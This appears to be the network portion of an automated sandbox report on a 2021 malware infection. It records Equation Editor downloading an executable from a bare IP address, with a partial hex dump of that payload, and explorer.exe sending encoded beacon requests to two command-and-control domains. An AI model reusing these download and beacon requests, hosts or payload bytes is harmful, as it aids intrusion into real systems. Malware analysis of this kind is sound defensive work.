                                          Sep 27, 2021 14:04:16.162359953 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162364960 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162378073 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162408113 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162914038 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162942886 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162966013 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162974119 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162992954 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163002014 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163022041 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163038969 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163079023 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163141966 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163173914 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163219929 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163464069 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163491011 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163511992 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163513899 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163531065 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163533926 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163552046 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163558006 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163568974 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163580894 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163599014 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163609028 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163618088 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163633108 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163649082 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163655996 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163669109 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163696051 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163702011 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163726091 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163744926 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163750887 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163764000 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163780928 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163798094 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163804054 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163816929 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163830042 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163846016 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163852930 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163863897 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163880110 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163891077 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163906097 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163923979 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163929939 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163939953 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163953066 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163966894 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.163974047 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.163986921 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.164005995 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.164516926 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.187777042 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.954366922 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:05:31.191185951 CEST4916680192.168.2.22128.65.195.232
                                          Sep 27, 2021 14:05:31.207000971 CEST8049166128.65.195.232192.168.2.22
                                          Sep 27, 2021 14:05:31.207079887 CEST4916680192.168.2.22128.65.195.232
                                          Sep 27, 2021 14:05:31.207247972 CEST4916680192.168.2.22128.65.195.232
                                          Sep 27, 2021 14:05:31.225320101 CEST8049166128.65.195.232192.168.2.22
                                          Sep 27, 2021 14:05:31.225341082 CEST8049166128.65.195.232192.168.2.22
                                          Sep 27, 2021 14:05:31.225512981 CEST4916680192.168.2.22128.65.195.232
                                          Sep 27, 2021 14:05:31.225640059 CEST4916680192.168.2.22128.65.195.232
                                          Sep 27, 2021 14:05:31.241245985 CEST8049166128.65.195.232192.168.2.22
                                          Sep 27, 2021 14:05:49.432673931 CEST4916780192.168.2.2234.102.136.180
                                          Sep 27, 2021 14:05:49.445827007 CEST804916734.102.136.180192.168.2.22
                                          Sep 27, 2021 14:05:49.445930958 CEST4916780192.168.2.2234.102.136.180
                                          Sep 27, 2021 14:05:49.446181059 CEST4916780192.168.2.2234.102.136.180
                                          Sep 27, 2021 14:05:49.458626032 CEST804916734.102.136.180192.168.2.22
                                          Sep 27, 2021 14:05:49.561790943 CEST804916734.102.136.180192.168.2.22
                                          Sep 27, 2021 14:05:49.561851025 CEST804916734.102.136.180192.168.2.22
                                          Sep 27, 2021 14:05:49.561950922 CEST4916780192.168.2.2234.102.136.180
                                          Sep 27, 2021 14:05:49.561983109 CEST4916780192.168.2.2234.102.136.180
                                          Sep 27, 2021 14:05:49.574595928 CEST804916734.102.136.180192.168.2.22

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 14:05:31.143651962 CEST5216753192.168.2.228.8.8.8
                                          Sep 27, 2021 14:05:31.177267075 CEST53521678.8.8.8192.168.2.22
                                          Sep 27, 2021 14:05:49.398300886 CEST5059153192.168.2.228.8.8.8
                                          Sep 27, 2021 14:05:49.430988073 CEST53505918.8.8.8192.168.2.22

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 14:05:31.143651962 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.paradisgrp.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 14:05:49.398300886 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.uvoyus.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 14:05:31.177267075 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.paradisgrp.com128.65.195.232A (IP address)IN (0x0001)
                                          Sep 27, 2021 14:05:49.430988073 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.uvoyus.comuvoyus.comCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 14:05:49.430988073 CEST8.8.8.8192.168.2.220xc18cNo error (0)uvoyus.com34.102.136.180A (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • 180.214.239.85
                                          • www.paradisgrp.com
                                          • www.uvoyus.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.2249165180.214.239.8580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 14:04:12.525746107 CEST0OUTGET /service/rundll32.exe HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 180.214.239.85
                                          Connection: Keep-Alive
                                          Sep 27, 2021 14:04:12.877863884 CEST1INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 12:04:10 GMT
                                          Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                          Last-Modified: Mon, 27 Sep 2021 09:26:10 GMT
                                          ETag: "a7600-5ccf6b00272b4"
                                          Accept-Ranges: bytes
                                          Content-Length: 685568
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/x-msdownload
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 8d 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 0a 00 00 00 00 00 00 ee 88 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 88 0a 00 4f 00 00 00 00 a0 0a 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 69 0a 00 00 20 00 00 00 6a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 06 00 00 00 a0 0a 00 00 08 00 00 00 6c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 88 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc 43 02 00 f0 f2 00 00 03 00 00 00 01 01 00 06 cc 36 03 00 d0 51 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 7d 01 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 08 00 00 04 2a 1e 02 7b 08 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 1e 02 7b 0c 00 00 04 2a 22 02 03 7d 0d 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 22 02 03 7d 0e 00 00 04 2a 1e 02 7b 0e 00 00 04 2a 22 02 03 7d 0f 00 00 04 2a 1e 02 7b 0f 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 10 00 00 04 2a 13 30 02 00 71 00 00 00 00 00 00 00 02 28 17 00 00 0a 00 00 02 16 28 19 00 00 06 00 02 16 28 1b 00 00 06 00 02 16 28 1d 00 00 06 00 02 16 28 15 00 00 06 00 02 16 28 0f 00 00 06 00 02 16 28 17 00 00 06 00 02 16 28 09 00 00 06 00 02 16 28 09 00 00 06 00 02 16 28 01 00 00 06 00 02 16 28 03 00 00 06 00 02 16 28 0d 00 00 06 00 02 16 28 13 00 00 06 00 02 16 28 1f 00 00 06 00 2a 6a 00 02 03 28 19 00 00 06 00 02 04 28 1b 00 00 06 00 02
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQa0j @ @O` H.texti j `.rsrc`l@@.reloct@BHC6Q"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*0q((((((((((((((*j((
                                          Sep 27, 2021 14:04:12.877912045 CEST3INData Raw: 05 28 1d 00 00 06 00 2a 2a 00 02 03 28 0d 00 00 06 00 2a 4a 00 02 03 28 09 00 00 06 00 02 04 28 0b 00 00 06 00 2a 4a 00 02 03 28 01 00 00 06 00 02 04 28 05 00 00 06 00 2a 4a 00 02 03 28 03 00 00 06 00 02 04 28 07 00 00 06 00 2a 2a 00 02 03 28 1f
                                          Data Ascii: (**(*J((*J((*J((**(**(**(*J((**(*0s!(o(o(o(o(o(o(
                                          Sep 27, 2021 14:04:12.877931118 CEST4INData Raw: 00 00 1b 30 03 00 00 0b 00 00 03 00 00 11 00 02 28 02 00 00 06 0a 06 39 82 02 00 00 00 00 03 50 6f 62 01 00 06 6f 18 00 00 0a 0b 38 50 02 00 00 12 01 28 19 00 00 0a 0c 00 08 6f 26 01 00 06 72 01 00 00 70 28 1a 00 00 0a 2d 12 08 6f 26 01 00 06 72
                                          Data Ascii: 0(9Pobo8P(o&rp(-o&rp(,o,rp(+9o"((9oi.ok+,oio)r%po++ogo)r%po+o&rp(
                                          Sep 27, 2021 14:04:12.877960920 CEST5INData Raw: 00 00 0a 00 dc 00 02 28 0a 00 00 06 2c 08 02 28 0c 00 00 06 2b 01 16 13 1a 11 1a 39 57 01 00 00 00 00 03 50 6f 62 01 00 06 6f 18 00 00 0a 13 1b 38 24 01 00 00 12 1b 28 19 00 00 0a 13 1c 00 11 1c 6f 22 01 00 06 72 1b 00 00 70 28 1a 00 00 0a 2c 11
                                          Data Ascii: (,(+9WPobo8$(o"rp(,o og+9ogo)rSpo+o Y8Poboo&r-p(-Poboo&r3p(,(,!PobYoo&r3
                                          Sep 27, 2021 14:04:13.248920918 CEST7INData Raw: 1e 00 00 0a 04 6f 67 01 00 06 6f 29 01 00 06 00 03 50 6f 62 01 00 06 11 34 6f 1e 00 00 0a 72 6f 00 00 70 6f 2b 01 00 06 00 2b 4b 11 25 16 fe 01 13 36 11 36 2c 1d 00 11 23 04 6f 67 01 00 06 6f 29 01 00 06 00 11 23 72 6f 00 00 70 6f 2b 01 00 06 00
                                          Data Ascii: ogo)Pob4oropo++K%66,#ogo)#ropo+4X44#o /4+77:+"(:"o*Adcs"\7-
                                          Sep 27, 2021 14:04:13.248961926 CEST8INData Raw: 84 2e 10 2b 00 11 15 20 8f b9 b4 f6 2e 47 38 d0 01 00 00 11 13 72 91 00 00 70 28 1a 00 00 0a 3a b5 00 00 00 38 ba 01 00 00 11 13 72 97 00 00 70 28 1a 00 00 0a 3a b2 00 00 00 38 a4 01 00 00 11 13 72 9d 00 00 70 28 1a 00 00 0a 3a b1 00 00 00 38 8e
                                          Data Ascii: .+ .G8rp(:8rp(:8rp(:8rp(:8xrp(:8brp(:8Lrp(:86rp(:8 rp(:8sQsE8sW
                                          Sep 27, 2021 14:04:13.248976946 CEST10INData Raw: 0d 72 d3 00 00 70 6f 2f 00 00 0a 13 12 11 0d 11 12 11 0d 6f 2a 00 00 0a 11 12 59 6f 2b 00 00 0a 13 13 11 0d 16 11 12 17 59 6f 2b 00 00 0a 13 14 11 13 11 14 73 6e 00 00 06 11 0b 73 45 00 00 06 13 09 2b 4b 73 73 00 00 06 11 0b 73 45 00 00 06 13 09
                                          Data Ascii: rpo/o*Yo+Yo+snsE+KsssE+;svsE++rp('o((+sgsE+Xi:o3,%o4Xo5+o6o7%:
                                          Sep 27, 2021 14:04:13.248989105 CEST11INData Raw: 6f 6d 00 00 06 72 23 01 00 70 28 1a 00 00 0a 13 30 11 30 2c 06 11 25 18 5a 13 25 00 11 24 6f 42 00 00 06 16 fe 01 13 31 11 31 2c 06 11 25 17 58 13 25 11 22 11 25 5a 13 22 00 12 23 28 4e 00 00 0a 3a bc fe ff ff de 0f 12 23 fe 16 11 00 00 1b 6f 1d
                                          Data Ascii: omr#p(00,%Z%$oB11,%X%"%Z"#(N:#o(OoCozoP"o9X"X (Q:O o(OoCo{22,(R:ooF3+K3
                                          Sep 27, 2021 14:04:13.249036074 CEST12INData Raw: 0a 13 5f 2b 30 12 5f 28 5c 00 00 0a 13 60 00 11 60 6f 2c 00 00 06 13 61 11 61 17 6f 09 00 00 06 00 11 61 17 6f 0b 00 00 06 00 11 41 11 61 6f 57 00 00 0a 00 00 12 5f 28 5d 00 00 0a 2d c7 de 0f 12 5f fe 16 15 00 00 1b 6f 1d 00 00 0a 00 dc 00 2b 58
                                          Data Ascii: _+0_(\``o,aaoaoAaoW_(]-_o+X;o[b+0b(\cco,ddodoAdoWb(]-bo8@oDuee9@oDtffo^o^g8g(_
                                          Sep 27, 2021 14:04:13.249063969 CEST14INData Raw: 1d 00 00 06 00 11 41 11 8a 6f 57 00 00 0a 00 11 8a 6f 2c 00 00 06 13 8b 11 8b 16 6f 1d 00 00 06 00 11 41 11 8b 6f 57 00 00 0a 00 00 12 88 28 5d 00 00 0a 2d a2 de 0f 12 88 fe 16 15 00 00 1b 6f 1d 00 00 0a 00 dc 00 38 f0 02 00 00 11 75 6f 6b 00 00
                                          Data Ascii: AoWo,oAoW(]-o8uokrep(,uomrAp(+,f;o[+9(\o,oooAoW(]-o8]uokrep(,
                                          Sep 27, 2021 14:04:13.249087095 CEST15INData Raw: 00 00 02 00 00 00 cf 09 00 00 3d 00 00 00 0c 0a 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 71 0a 00 00 64 00 00 00 d5 0a 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 58 0a 00 00 9b 00 00 00 f3 0a 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 54 0b 00 00
                                          Data Ascii: =qdXT>>o$bb1b0Fv


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.2249166128.65.195.23280C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 14:05:31.207247972 CEST724OUTGET /cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA== HTTP/1.1
                                          Host: www.paradisgrp.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 14:05:31.225320101 CEST725INHTTP/1.1 404 Not Found
                                          Date: Mon, 27 Sep 2021 12:05:31 GMT
                                          Server: Apache
                                          Vary: accept-language,accept-charset
                                          Upgrade: h2
                                          Connection: Upgrade, close
                                          Accept-Ranges: bytes
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=utf-8
                                          Content-Language: en
                                          Data Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 31 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 39 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0d 0a 31 31 0d 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 31 0d 0a 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 35 0d 0a 77 77 77 2e 70 61 72 61 64 69 73 67 72 70 2e 63 6f 6d 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 0d 0a 32 39 0d 0a 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e
                                          Data Ascii: c8<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="13en"><head><title>38Object not found!</title><link rev="made" href="mailto:111webmaster@paradisgrp.com" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>1bObject not found!</h1><p>39 The requested URL was not found on this server. 57 If you entered the URL manually please check your spelling and try again. 29</p><p>48If you think this is a server error, please contactthe <a href="mailto:29webmaster@paradisgrp.com">webmaster</a>.11</p><h2>Error 21404</h2><address> <a href="/">25www.paradisgrp.com</a><br /> <span>29Apache</span></address></body>
                                          Sep 27, 2021 14:05:31.225341082 CEST725INData Raw: 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: </html>10


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 14:05:49.446181059 CEST726OUTGET /cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp HTTP/1.1
                                          Host: www.uvoyus.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Sep 27, 2021 14:05:49.561790943 CEST727INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Mon, 27 Sep 2021 12:05:49 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "6139ed55-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function NameHook TypeActive in Processes
                                          PeekMessageAINLINEexplorer.exe
